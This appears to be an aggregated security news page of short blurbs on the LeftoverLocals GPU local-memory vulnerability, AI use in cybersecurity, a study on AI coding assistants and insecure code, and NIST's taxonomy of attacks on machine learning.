Security News
Researchers at cybersecurity research and consulting firm Trail of Bits have discovered a vulnerability that could allow attackers to read GPU local memory from affected Apple, Qualcomm, AMD and Imagination GPUs. In particular, the vulnerability-which the researchers named LeftoverLocals-can access conversations performed with large language models and machine learning models on affected GPUs.
Researchers at cybersecurity research and consulting firm Trail of Bits have discovered a vulnerability that could allow attackers to read GPU local memory from affected Apple, Qualcomm, AMD and Imagination GPUs. In particular, the vulnerability-which the researchers named LeftoverLocals-can access conversations performed with large language models and machine learning models on affected GPUs.
Besides helping security teams perform these tasks more accurately, AI also helps them improve their working speed. Speed is also what cybercriminals are achieving when harnessing the power of AI: it allows them to quickly adapt their attacks to new security measures.
Research made public on Tuesday detailed how miscreants can exploit the hole to read data they're not supposed to in a system's local GPU memory. While the flaw potentially affects all GPU applications on vulnerable chips, it is especially concerning for those processing machine-learning applications because of the amount of data these models process using GPUs, and therefore the amount of potentially sensitive information that could be swiped by exploiting this issue.
A new vulnerability dubbed 'LeftoverLocals' affecting graphics processing units from AMD, Apple, Qualcomm, and Imagination Technologies allows retrieving data from the local memory space. [...]
Wing Security announced today that it now offers free discovery and a paid tier for automated control over thousands of AI and AI-powered SaaS applications. This will allow companies to better...
"At least, that's true today, with today's programmers using today's AI assistants." "Overall, we find that participants who had access to an AI assistant based on OpenAI's codex-davinci-002 model wrote significantly less secure code than those without access."
According to a survey, 33 percent of organizations are currently leveraging generative AI in at least one business function. Cybersecurity is also a key area where AI is being used, with 51 percent of business owners planning to enhance their cybersecurity efforts using this technology.
The failure of LLMs to live up to their hype will be the story of 2024, as generic models become relegated to consumer-centric applications and enterprise users turn to smaller, more targeted AI models, purpose-built to meet their business needs. Recognizing the value of the data they hold, companies will seek to secure it by taking a "Hybrid cloud by design" approach, rather than "Hybrid cloud by default." Ultimately, data protection will emerge as a key pillar in a successful AI strategy, and companies will move towards prioritizing AI solutions that are trustworthy and responsible.
The publication, "Adversarial Machine Learning: A Taxonomy and Terminology of Attacks and Mitigations," is a key component of NIST's broader initiative to foster the creation of reliable AI. This effort aims to facilitate the implementation of NIST's AI Risk Management Framework and aims to assist AI developers and users in understanding potential attacks and strategies to counter them, acknowledging that there is no silver bullet. "The risks of AI are as significant as the potential benefits. The latest publication from NIST is a great start to explore and categorize attacks against AI systems. It defines a formal taxonomy and provides a good set of attack classes. It does miss a few areas, such as misuse of the tools to cause harm, abuse of inherited trust by people believing AI is an authority, and the ability to de-identify people and derive sensitive data through aggregated analysis," Matthew Rosenquist, CISO at Eclipz.io commented.